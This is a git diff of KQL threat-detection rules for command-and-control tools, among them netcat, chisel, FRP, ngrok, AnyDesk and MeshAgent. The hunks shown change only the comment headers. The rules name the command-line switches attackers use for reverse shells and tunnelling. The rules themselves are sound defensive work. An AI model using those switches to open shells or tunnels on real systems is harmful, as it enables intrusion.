 | where FolderPath endswith "\\chisel.exe" or ((ProcessCommandLine contains "exe client " or ProcessCommandLine contains "exe server ") and (ProcessCommandLine contains "-socks5" or ProcessCommandLine contains "-reverse" or ProcessCommandLine contains " r:" or ProcessCommandLine contains ":127.0.0.1:" or ProcessCommandLine contains "-tls-skip-verify " or ProcessCommandLine contains ":socks"))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/pua_fast_reverse_proxy_frp_execution.kql b/KQL/rules/Command and Control/pua_fast_reverse_proxy_frp_execution.kql
index a1db24c2..0ede4f6b 100644
--- a/KQL/rules/Command and Control/pua_fast_reverse_proxy_frp_execution.kql
+++ b/KQL/rules/Command and Control/pua_fast_reverse_proxy_frp_execution.kql
@@ -1,12 +1,12 @@
-// Title: PUA - Fast Reverse Proxy (FRP) Execution
-// Author: frack113, Florian Roth
-// Date: 2022-09-02
-// Level: high
-// Description: Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1090
-// False Positives:
-// - Legitimate use
-
-DeviceProcessEvents
+// Title: PUA - Fast Reverse Proxy (FRP) Execution
+// Author: frack113, Florian Roth
+// Date: 2022-09-02
+// Level: high
+// Description: Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1090
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "\\frpc.ini" or (MD5 startswith "7D9C233B8C9E3F0EA290D2B84593C842" or SHA1 startswith "06DDC9280E1F1810677935A2477012960905942F" or SHA256 startswith "57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C") or (FolderPath endswith "\\frpc.exe" or FolderPath endswith "\\frps.exe")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/pua_iox_tunneling_tool_execution.kql b/KQL/rules/Command and Control/pua_iox_tunneling_tool_execution.kql
index 9a56d33a..f792faa5 100644
--- a/KQL/rules/Command and Control/pua_iox_tunneling_tool_execution.kql
+++ b/KQL/rules/Command and Control/pua_iox_tunneling_tool_execution.kql
@@ -1,12 +1,12 @@
-// Title: PUA- IOX Tunneling Tool Execution
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-10-08
-// Level: high
-// Description: Detects the use of IOX - a tool for port forwarding and intranet proxy purposes
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1090
-// False Positives:
-// - Legitimate use
-
-DeviceProcessEvents
+// Title: PUA- IOX Tunneling Tool Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-10-08
+// Level: high
+// Description: Detects the use of IOX - a tool for port forwarding and intranet proxy purposes
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1090
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
 | where FolderPath endswith "\\iox.exe" or (ProcessCommandLine contains ".exe fwd -l " or ProcessCommandLine contains ".exe fwd -r " or ProcessCommandLine contains ".exe proxy -l " or ProcessCommandLine contains ".exe proxy -r ") or (MD5 startswith "9DB2D314DD3F704A02051EF5EA210993" or SHA1 startswith "039130337E28A6623ECF9A0A3DA7D92C5964D8DD" or SHA256 startswith "C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/pua_netcat_suspicious_execution.kql b/KQL/rules/Command and Control/pua_netcat_suspicious_execution.kql
index 3b02ed3f..4aa48ba4 100644
--- a/KQL/rules/Command and Control/pua_netcat_suspicious_execution.kql
+++ b/KQL/rules/Command and Control/pua_netcat_suspicious_execution.kql
@@ -1,12 +1,12 @@
-// Title: PUA - Netcat Suspicious Execution
-// Author: frack113, Florian Roth (Nextron Systems)
-// Date: 2021-07-21
-// Level: high
-// Description: Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1095
-// False Positives:
-// - Legitimate ncat use
-
-DeviceProcessEvents
+// Title: PUA - Netcat Suspicious Execution
+// Author: frack113, Florian Roth (Nextron Systems)
+// Date: 2021-07-21
+// Level: high
+// Description: Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1095
+// False Positives:
+// - Legitimate ncat use
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -lvp " or ProcessCommandLine contains " -lvnp" or ProcessCommandLine contains " -l -v -p " or ProcessCommandLine contains " -lv -p " or ProcessCommandLine contains " -l --proxy-type http " or ProcessCommandLine contains " -vnl --exec " or ProcessCommandLine contains " -vnl -e " or ProcessCommandLine contains " --lua-exec " or ProcessCommandLine contains " --sh-exec ") or (FolderPath endswith "\\nc.exe" or FolderPath endswith "\\ncat.exe" or FolderPath endswith "\\netcat.exe")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/pua_ngrok_execution.kql b/KQL/rules/Command and Control/pua_ngrok_execution.kql
index 491b88e1..0be978cd 100644
--- a/KQL/rules/Command and Control/pua_ngrok_execution.kql
+++ b/KQL/rules/Command and Control/pua_ngrok_execution.kql
@@ -1,14 +1,14 @@
-// Title: PUA - Ngrok Execution
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-05-14
-// Level: high
-// Description: Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.
-// Involved domains are bin.equinox.io for download and *.ngrok.io for connections.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1572
-// False Positives:
-// - Another tool that uses the command line switches of Ngrok
-// - Ngrok http 3978 (https://learn.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)
-
-DeviceProcessEvents
+// Title: PUA - Ngrok Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-05-14
+// Level: high
+// Description: Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.
+// Involved domains are bin.equinox.io for download and *.ngrok.io for connections.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1572
+// False Positives:
+// - Another tool that uses the command line switches of Ngrok
+// - Ngrok http 3978 (https://learn.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " tcp 139" or ProcessCommandLine contains " tcp 445" or ProcessCommandLine contains " tcp 3389" or ProcessCommandLine contains " tcp 5985" or ProcessCommandLine contains " tcp 5986") or (ProcessCommandLine contains " start " and ProcessCommandLine contains "--all" and ProcessCommandLine contains "--config" and ProcessCommandLine contains ".yml") or ((ProcessCommandLine contains " tcp " or ProcessCommandLine contains " http " or ProcessCommandLine contains " authtoken ") and FolderPath endswith "ngrok.exe") or (ProcessCommandLine contains ".exe authtoken " or ProcessCommandLine contains ".exe start --all")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/pua_nimgrab_execution.kql b/KQL/rules/Command and Control/pua_nimgrab_execution.kql
index 796c423b..b373859a 100644
--- a/KQL/rules/Command and Control/pua_nimgrab_execution.kql
+++ b/KQL/rules/Command and Control/pua_nimgrab_execution.kql
@@ -1,12 +1,12 @@
-// Title: PUA - Nimgrab Execution
-// Author: frack113
-// Date: 2022-08-28
-// Level: high
-// Description: Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1105
-// False Positives:
-// - Legitimate use of Nim on a developer systems
-
-DeviceProcessEvents
+// Title: PUA - Nimgrab Execution
+// Author: frack113
+// Date: 2022-08-28
+// Level: high
+// Description: Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+// - Legitimate use of Nim on a developer systems
+
+DeviceProcessEvents
 | where (MD5 startswith "2DD44C3C29D667F5C0EF5F9D7C7FFB8B" or SHA256 startswith "F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559") or FolderPath endswith "\\nimgrab.exe"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/pua_nps_tunneling_tool_execution.kql b/KQL/rules/Command and Control/pua_nps_tunneling_tool_execution.kql
index 3724f9df..c87421b7 100644
--- a/KQL/rules/Command and Control/pua_nps_tunneling_tool_execution.kql
+++ b/KQL/rules/Command and Control/pua_nps_tunneling_tool_execution.kql
@@ -1,12 +1,12 @@
-// Title: PUA - NPS Tunneling Tool Execution
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-10-08
-// Level: high
-// Description: Detects the use of NPS, a port forwarding and intranet penetration proxy server
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1090
-// False Positives:
-// - Legitimate use
-
-DeviceProcessEvents
+// Title: PUA - NPS Tunneling Tool Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-10-08
+// Level: high
+// Description: Detects the use of NPS, a port forwarding and intranet penetration proxy server
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1090
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -server=" and ProcessCommandLine contains " -vkey=" and ProcessCommandLine contains " -password=") or ProcessCommandLine contains " -config=npc" or (MD5 startswith "AE8ACF66BFE3A44148964048B826D005" or SHA1 startswith "CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181" or SHA256 startswith "5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856") or FolderPath endswith "\\npc.exe"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/quickassist_execution.kql b/KQL/rules/Command and Control/quickassist_execution.kql
index 5c5f13fb..d775ccb6 100644
--- a/KQL/rules/Command and Control/quickassist_execution.kql
+++ b/KQL/rules/Command and Control/quickassist_execution.kql
@@ -1,12 +1,12 @@
-// Title: QuickAssist Execution
-// Author: Muhammad Faisal (@faisalusuf)
-// Date: 2024-12-19
-// Level: low
-// Description: Detects the execution of Microsoft Quick Assist tool "QuickAssist.exe". This utility can be used by attackers to gain remote access.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1219.002
-// False Positives:
-// - Legitimate use of Quick Assist in the environment.
-
-DeviceProcessEvents
+// Title: QuickAssist Execution
+// Author: Muhammad Faisal (@faisalusuf)
+// Date: 2024-12-19
+// Level: low
+// Description: Detects the execution of Microsoft Quick Assist tool "QuickAssist.exe". This utility can be used by attackers to gain remote access.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Legitimate use of Quick Assist in the environment.
+
+DeviceProcessEvents
 | where FolderPath endswith "\\QuickAssist.exe"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/rdp_over_reverse_ssh_tunnel.kql b/KQL/rules/Command and Control/rdp_over_reverse_ssh_tunnel.kql
index 4fc16d9e..2b3e030b 100644
--- a/KQL/rules/Command and Control/rdp_over_reverse_ssh_tunnel.kql
+++ b/KQL/rules/Command and Control/rdp_over_reverse_ssh_tunnel.kql
@@ -1,10 +1,10 @@
-// Title: RDP Over Reverse SSH Tunnel
-// Author: Samir Bousseaden
-// Date: 2019-02-16
-// Level: high
-// Description: Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1572, attack.lateral-movement, attack.t1021.001, car.2013-07-002
-
-DeviceNetworkEvents
+// Title: RDP Over Reverse SSH Tunnel
+// Author: Samir Bousseaden
+// Date: 2019-02-16
+// Level: high
+// Description: Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1572, attack.lateral-movement, attack.t1021.001, car.2013-07-002
+
+DeviceNetworkEvents
 | where (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "::1/128")) and (InitiatingProcessFolderPath endswith "\\svchost.exe" and LocalPort == 3389)
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/rdp_to_http_or_https_target_ports.kql b/KQL/rules/Command and Control/rdp_to_http_or_https_target_ports.kql
index bafdc6f3..a71eedb4 100644
--- a/KQL/rules/Command and Control/rdp_to_http_or_https_target_ports.kql
+++ b/KQL/rules/Command and Control/rdp_to_http_or_https_target_ports.kql
@@ -1,10 +1,10 @@
-// Title: RDP to HTTP or HTTPS Target Ports
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-04-29
-// Level: high
-// Description: Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1572, attack.lateral-movement, attack.t1021.001, car.2013-07-002
-
-DeviceNetworkEvents
+// Title: RDP to HTTP or HTTPS Target Ports
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-04-29
+// Level: high
+// Description: Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1572, attack.lateral-movement, attack.t1021.001, car.2013-07-002
+
+DeviceNetworkEvents
 | where (RemotePort in~ ("80", "443")) and InitiatingProcessFolderPath endswith "\\svchost.exe" and LocalPort == 3389
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/remote_access_tool_anydesk_execution.kql b/KQL/rules/Command and Control/remote_access_tool_anydesk_execution.kql
index f84a0641..d348e0b5 100644
--- a/KQL/rules/Command and Control/remote_access_tool_anydesk_execution.kql
+++ b/KQL/rules/Command and Control/remote_access_tool_anydesk_execution.kql
@@ -1,14 +1,14 @@
-// Title: Remote Access Tool - AnyDesk Execution
-// Author: frack113
-// Date: 2022-02-11
-// Level: medium
-// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
-// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
-// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1219.002
-// False Positives:
-// - Legitimate use
-
-DeviceProcessEvents
+// Title: Remote Access Tool - AnyDesk Execution
+// Author: frack113
+// Date: 2022-02-11
+// Level: medium
+// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\AnyDesk.exe" or FolderPath endswith "\\AnyDeskMSI.exe") or ProcessVersionInfoFileDescription =~ "AnyDesk" or ProcessVersionInfoProductName =~ "AnyDesk" or ProcessVersionInfoCompanyName =~ "AnyDesk Software GmbH"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/remote_access_tool_anydesk_execution_from_suspicious_folder.kql b/KQL/rules/Command and Control/remote_access_tool_anydesk_execution_from_suspicious_folder.kql
index 2f688535..ac1ebac0 100644
--- a/KQL/rules/Command and Control/remote_access_tool_anydesk_execution_from_suspicious_folder.kql
+++ b/KQL/rules/Command and Control/remote_access_tool_anydesk_execution_from_suspicious_folder.kql
@@ -1,14 +1,14 @@
-// Title: Remote Access Tool - Anydesk Execution From Suspicious Folder
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-05-20
-// Level: high
-// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
-// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
-// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1219.002
-// False Positives:
-// - Legitimate use of AnyDesk from a non-standard folder
-
-DeviceProcessEvents
+// Title: Remote Access Tool - Anydesk Execution From Suspicious Folder
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-05-20
+// Level: high
+// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Legitimate use of AnyDesk from a non-standard folder
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\AnyDesk.exe" or FolderPath endswith "\\AnyDeskMSI.exe") or ProcessVersionInfoFileDescription =~ "AnyDesk" or ProcessVersionInfoProductName =~ "AnyDesk" or ProcessVersionInfoCompanyName =~ "AnyDesk Software GmbH") and (not((FolderPath contains "\\AppData\\" or FolderPath contains "Program Files (x86)\\AnyDesk" or FolderPath contains "Program Files\\AnyDesk")))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/remote_access_tool_anydesk_piped_password_via_cli.kql b/KQL/rules/Command and Control/remote_access_tool_anydesk_piped_password_via_cli.kql
index 88180709..1e41e786 100644
--- a/KQL/rules/Command and Control/remote_access_tool_anydesk_piped_password_via_cli.kql
+++ b/KQL/rules/Command and Control/remote_access_tool_anydesk_piped_password_via_cli.kql
@@ -1,13 +1,13 @@
-// Title: Remote Access Tool - AnyDesk Piped Password Via CLI
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-09-28
-// Level: medium
-// Description: Detects piping the password to an anydesk instance via CMD and the '--set-password' flag.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1219.002
-// False Positives:
-// - Legitimate piping of the password to anydesk
-// - Some FP could occur with similar tools that uses the same command line '--set-password'
-
-DeviceProcessEvents
+// Title: Remote Access Tool - AnyDesk Piped Password Via CLI
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-28
+// Level: medium
+// Description: Detects piping the password to an anydesk instance via CMD and the '--set-password' flag.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Legitimate piping of the password to anydesk
+// - Some FP could occur with similar tools that uses the same command line '--set-password'
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "/c " and ProcessCommandLine contains "echo " and ProcessCommandLine contains ".exe --set-password"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/remote_access_tool_anydesk_silent_installation.kql b/KQL/rules/Command and Control/remote_access_tool_anydesk_silent_installation.kql
index ad374038..527b59fd 100644
--- a/KQL/rules/Command and Control/remote_access_tool_anydesk_silent_installation.kql
+++ b/KQL/rules/Command and Control/remote_access_tool_anydesk_silent_installation.kql
@@ -1,12 +1,12 @@
-// Title: Remote Access Tool - AnyDesk Silent Installation
-// Author: Ján Trenčanský
-// Date: 2021-08-06
-// Level: high
-// Description: Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1219.002
-// False Positives:
-// - Legitimate deployment of AnyDesk
-
-DeviceProcessEvents
+// Title: Remote Access Tool - AnyDesk Silent Installation
+// Author: Ján Trenčanský
+// Date: 2021-08-06
+// Level: high
+// Description: Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Legitimate deployment of AnyDesk
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "--install" and ProcessCommandLine contains "--start-with-win" and ProcessCommandLine contains "--silent"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/remote_access_tool_gotoassist_execution.kql b/KQL/rules/Command and Control/remote_access_tool_gotoassist_execution.kql
index 63cf323e..08db274e 100644
--- a/KQL/rules/Command and Control/remote_access_tool_gotoassist_execution.kql
+++ b/KQL/rules/Command and Control/remote_access_tool_gotoassist_execution.kql
@@ -1,14 +1,14 @@
-// Title: Remote Access Tool - GoToAssist Execution
-// Author: frack113
-// Date: 2022-02-13
-// Level: medium
-// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
-// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
-// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1219.002
-// False Positives:
-// - Legitimate use
-
-DeviceProcessEvents
+// Title: Remote Access Tool - GoToAssist Execution
+// Author: frack113
+// Date: 2022-02-13
+// Level: medium
+// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
 | where ProcessVersionInfoFileDescription =~ "GoTo Opener" or ProcessVersionInfoProductName =~ "GoTo Opener" or ProcessVersionInfoCompanyName =~ "LogMeIn, Inc."
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/remote_access_tool_logmein_execution.kql b/KQL/rules/Command and Control/remote_access_tool_logmein_execution.kql
index 3a02dfc9..8cd185d7 100644
--- a/KQL/rules/Command and Control/remote_access_tool_logmein_execution.kql
+++ b/KQL/rules/Command and Control/remote_access_tool_logmein_execution.kql
@@ -1,14 +1,14 @@
-// Title: Remote Access Tool - LogMeIn Execution
-// Author: frack113
-// Date: 2022-02-11
-// Level: medium
-// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
-// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
-// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1219.002
-// False Positives:
-// - Legitimate use
-
-DeviceProcessEvents
+// Title: Remote Access Tool - LogMeIn Execution
+// Author: frack113
+// Date: 2022-02-11
+// Level: medium
+// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
 | where ProcessVersionInfoFileDescription =~ "LMIGuardianSvc" or ProcessVersionInfoProductName =~ "LMIGuardianSvc" or ProcessVersionInfoCompanyName =~ "LogMeIn, Inc."
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/remote_access_tool_meshagent_command_execution_via_meshcentral.kql b/KQL/rules/Command and Control/remote_access_tool_meshagent_command_execution_via_meshcentral.kql
index 933328ab..bad2e97c 100644
--- a/KQL/rules/Command and Control/remote_access_tool_meshagent_command_execution_via_meshcentral.kql
+++ b/KQL/rules/Command and Control/remote_access_tool_meshagent_command_execution_via_meshcentral.kql
@@ -1,13 +1,13 @@
-// Title: Remote Access Tool - MeshAgent Command Execution via MeshCentral
-// Author: @Kostastsale
-// Date: 2024-09-22
-// Level: medium
-// Description: Detects the use of MeshAgent to execute commands on the target host, particularly when threat actors might abuse it to execute commands directly.
-// MeshAgent can execute commands on the target host by leveraging win-console to obscure their activities and win-dispatcher to run malicious code through IPC with child processes.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1219.002
-// False Positives:
-// - False positives can be found in environments using MeshAgent for remote management, analysis should prioritize the grandparent process, MeshAgent.exe, and scrutinize the resulting child processes triggered by any suspicious interactive commands directed at the target host.
-
-DeviceProcessEvents
+// Title: Remote Access Tool - MeshAgent Command Execution via MeshCentral
+// Author: @Kostastsale
+// Date: 2024-09-22
+// Level: medium
+// Description: Detects the use of MeshAgent to execute commands on the target host, particularly when threat actors might abuse it to execute commands directly.
+// MeshAgent can execute commands on the target host by leveraging win-console to obscure their activities and win-dispatcher to run malicious code through IPC with child processes.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - False positives can be found in environments using MeshAgent for remote management, analysis should prioritize the grandparent process, MeshAgent.exe, and scrutinize the resulting child processes triggered by any suspicious interactive commands directed at the target host.
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and InitiatingProcessFolderPath endswith "\\meshagent.exe"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/remote_access_tool_netsupport_execution.kql b/KQL/rules/Command and Control/remote_access_tool_netsupport_execution.kql
index f1128c2c..93c2c113 100644
--- a/KQL/rules/Command and Control/remote_access_tool_netsupport_execution.kql
+++ b/KQL/rules/Command and Control/remote_access_tool_netsupport_execution.kql
@@ -1,14 +1,14 @@
-// Title: Remote Access Tool - NetSupport Execution
-// Author: frack113
-// Date: 2022-09-25
-// Level: medium
-// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
-// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
-// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1219.002
-// False Positives:
-// - Legitimate use
-
-DeviceProcessEvents
+// Title: Remote Access Tool - NetSupport Execution
+// Author: frack113
+// Date: 2022-09-25
+// Level: medium
+// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
 | where ProcessVersionInfoFileDescription =~ "NetSupport Client Configurator" or ProcessVersionInfoProductName =~ "NetSupport Remote Control" or ProcessVersionInfoCompanyName =~ "NetSupport Ltd" or ProcessVersionInfoOriginalFileName =~ "PCICFGUI.EXE"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_macos.kql b/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_macos.kql
index 4e947b67..1235b69b 100644
--- a/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_macos.kql
+++ b/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_macos.kql
@@ -1,14 +1,14 @@
-// Title: Remote Access Tool - Potential MeshAgent Execution - MacOS
-// Author: Norbert Jaśniewicz (AlphaSOC)
-// Date: 2025-05-19
-// Level: medium
-// Description: Detects potential execution of MeshAgent which is a tool used for remote access.
-// Historical data shows that threat actors rename MeshAgent binary to evade detection.
-// Matching command lines with the '--meshServiceName' argument can indicate that the MeshAgent is being used for remote access.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1219.002
-// False Positives:
-// - Environments that legitimately use MeshAgent
-
-DeviceProcessEvents
+// Title: Remote Access Tool - Potential MeshAgent Execution - MacOS
+// Author: Norbert Jaśniewicz (AlphaSOC)
+// Date: 2025-05-19
+// Level: medium
+// Description: Detects potential execution of MeshAgent which is a tool used for remote access.
+// Historical data shows that threat actors rename MeshAgent binary to evade detection.
+// Matching command lines with the '--meshServiceName' argument can indicate that the MeshAgent is being used for remote access.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Environments that legitimately use MeshAgent
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "--meshServiceName"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_windows.kql b/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_windows.kql
index 2c038b27..6612de57 100644
--- a/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_windows.kql
+++ b/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_windows.kql
@@ -1,14 +1,14 @@
-// Title: Remote Access Tool - Potential MeshAgent Execution - Windows
-// Author: Norbert Jaśniewicz (AlphaSOC)
-// Date: 2025-05-19
-// Level: medium
